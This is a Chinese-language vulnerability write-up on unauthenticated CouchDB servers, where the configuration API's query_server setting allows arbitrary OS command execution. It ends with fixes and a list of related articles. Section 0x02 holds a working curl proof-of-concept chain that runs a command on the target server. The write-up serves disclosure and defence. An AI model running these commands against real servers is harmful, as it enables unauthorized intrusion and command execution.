利用CouchDB未授權訪問漏洞執行任意系統命令
0x00 前言
5月16日阿里雲盾攻防對抗團隊從外部渠道獲知CouchDB資料庫存在未授權訪問漏洞(在配置不正確的情況下)。經過測試,雲盾團隊率先發現利用該未授權訪問漏洞不僅會造成資料的丟失和洩露,甚至可執行任意系統命令。雲盾安全專家團隊第一時間完成了漏洞上報、安全評級,並通知了所有可能受影響的使用者。下面將對該漏洞的出處和技術細節做詳細解釋。
0x01 漏洞的來龍去脈
CouchDB 是一個開源的面向文件的資料庫管理系統,可以透過 RESTful JavaScript Object Notation (JSON) API 訪問。CouchDB會預設會在5984埠開放Restful的API介面,用於資料庫的管理功能。
那麼,問題出在哪呢?翻閱官方描述會發現,CouchDB中有一個Query_Server的配置項,在官方文件中是這麼描述的:
CouchDB delegates computation of design documents functions to external query servers. The external query server is a special OS process which communicates with CouchDB over standard input/output using a very simple line-based protocol with JSON messages.
直白點說,就是CouchDB允許使用者指定一個二進位制程式或者指令碼,與CouchDB進行資料互動和處理,query_server在配置檔案local.ini中的格式:
[query_servers]
LANGUAGE = PATH ARGS
預設情況下,配置檔案中已經設定了兩個query_servers:
[query_servers]
javascript = /usr/bin/couchjs /usr/share/couchdb/server/main.js
coffeescript = /usr/bin/couchjs /usr/share/couchdb/server/main-coffee.js
可以看到,CouchDB在query_server中引入了外部的二進位制程式來執行命令,如果我們可以更改這個配置,那麼就可以利用資料庫來執行命令了,但是這個配置是在local.ini檔案中的,如何控制呢?
繼續讀官方的文件,發現了一個有意思的功能,CouchDB提供了一個API介面用來更改自身的配置,並把修改後的結果儲存到配置檔案中:
The CouchDB Server Configuration API provide an interface to query and update the various configuration values within a running CouchDB instance
也就是說,除了local.ini的配置檔案,CouchDB允許透過自身提供的Restful API介面動態修改配置屬性。結合以上兩點,我們可以透過一個未授權訪問的CouchDB,透過修改其query_server配置,來執行系統命令。
0x02 漏洞的POC
新增query_server配置,這裡執行ifconfig命令
#!shell
curl -X PUT 'http://1.1.1.1:5984/_config/query_servers/cmd' -d '"/sbin/ifconfig >/tmp/6666"'
新建一個臨時表,插入一條記錄
#!shell
curl -X PUT 'http://1.1.1.1:5984/vultest'
curl -X PUT 'http://1.1.1.1:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
呼叫query_server處理資料
#!shell
curl -X POST 'http://1.1.1.1:5984/vultest/_temp_view?limit=11' -d '{"language":"cmd","map":""}' -H 'Content-Type: application/json'
執行後,可以看到,指定的命令已經成功執行:
至於如何回顯執行結果,各位可以動動腦筋,歡迎互動。
0x03 漏洞修復建議:
1、指定CouchDB繫結的IP (需要重啟CouchDB才能生效) 在 /etc/couchdb/local.ini 檔案中找到 “bind_address = 0.0.0.0” ,把 0.0.0.0 修改為 127.0.0.1 ,然後儲存。注:修改後只有本機才能訪問CouchDB。
2、設定訪問密碼 (需要重啟CouchDB才能生效) 在 /etc/couchdb/local.ini 中找到“[admins]”欄位配置密碼。
附:參考連結:
- http://blog.rot13.org/2010/11/triggers-in-couchdb-from-queue-to-external-command-execution.html
- http://docs.couchdb.org/en/1.6.1/api/server/configuration.html#api-config
- http://docs.couchdb.org/en/1.6.1/intro/api.html
- http://docs.couchdb.org/en/1.6.1/config/query-servers.html
相關文章
- Redis 未授權訪問漏洞利用Redis
- 利用redis未授權訪問漏洞(windows版)RedisWindows
- Redis未授權訪問漏洞利用總結Redis
- 系統滲透漏洞の未授權訪問
- mongodb未授權訪問漏洞MongoDB
- 【漏洞復現】Redis未授權訪問漏洞Redis
- 銘說 | Redis未授權訪問漏洞GetshellRedis
- SaltStack未授權訪問及命令執行漏洞分析(CVE-2020-16846/25592)
- Druid未授權訪問實戰利用UI
- JBOSS未授權訪問
- Redis v6.0.5未授權訪問漏洞復現Redis
- Redis 未授權訪問漏洞(附Python指令碼)RedisPython指令碼
- Mongodb未授權訪問漏洞全網探測報告MongoDB
- Java安全漏洞:Druid未授權訪問解決JavaUI
- Linux sudo 漏洞可能導致未經授權的特權訪問Linux
- Redis 未授權訪問缺陷可輕易導致系統被黑Redis
- spark未授權RCE漏洞Spark
- 從零開始學習各種常見未授權訪問漏洞
- 多款Intel產品未授權訪問漏洞(CVE-2017-5689)Intel
- Hadoop Yarn REST API未授權漏洞利用挖礦分析HadoopYarnRESTAPI
- Redis未授權漏洞復現Redis
- WordPress4.6任意命令執行漏洞
- Etcd REST API 未授權訪問漏洞暴露 750MB 密碼和金鑰RESTAPI密碼
- 【雲原生攻防研究】Istio訪問授權再曝高危漏洞
- Linux sudo 被曝提權漏洞,任意使用者均能以 root 身份執行命令Linux
- Django任意程式碼執行漏洞分析Django
- 容器編排系統K8s之訪問控制--RBAC授權K8S
- 命令執行漏洞
- 微軟更改win10授權協議 禁止盜版遊戲和未授權硬體執行微軟Win10協議遊戲
- MySQL建立使用者授權訪問MySql
- 配置apache授權訪問目錄(轉)Apache
- CVE-2021-45232 Apache APISIX 從未授權訪問到RCEApacheAPI
- 利用oracle儲存過程執行作業系統命令Oracle儲存過程作業系統
- 懸鏡安全丨Java 反序列化任意程式碼執行漏洞分析與利用Java
- VMwareMac版本漏洞可任意執行惡意程式碼REMMac
- 利用CheckForIllegalCrossThreadCalls=false設定跨執行緒訪問ROSthreadFalse執行緒
- 基於Docker的MongoDB實現授權訪問DockerMongoDB
- Flipboard 資料庫未經授權訪問使用者賬號密碼洩露資料庫密碼